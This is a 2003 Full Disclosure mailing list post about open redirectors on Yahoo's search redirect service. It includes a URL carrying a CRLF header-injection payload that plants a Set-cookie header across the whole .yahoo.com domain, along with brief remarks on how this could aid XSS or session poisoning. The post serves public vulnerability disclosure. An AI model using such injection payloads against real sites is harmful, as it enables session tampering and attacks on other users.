Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: CERT: Vulnerability in web redirectors
From: David Leadbeater <dgl () dgl cx>
Date: Sat, 22 Mar 2003 21:19:16 +0000

Georgi Guninski wrote:
Like this one?:
--------------------
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org
--------------------
(may be wrapped)

That site also demonstrates another issue with this type of HTTP Redirector
that has been mentioned as a security risk before:
http://srd.yahoo.com/S=2766679:WS1/R=1/K=microsoft+sux/H=0/T=1048357500/F=131cc5f493bf26b0a115b6debc24d362/*http://www.cryptome.org%0D%0ASet-cookie:%20foo%3D123%3B%%20domain%3D.yahoo.com%3B%20path%3D/

It adds a cookie for the whole .yahoo.com domain, this could be an attack
vector for other XSS (I wouldn't be surprised if there is less checking
done on cookie input) or session poisoning type attacks.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]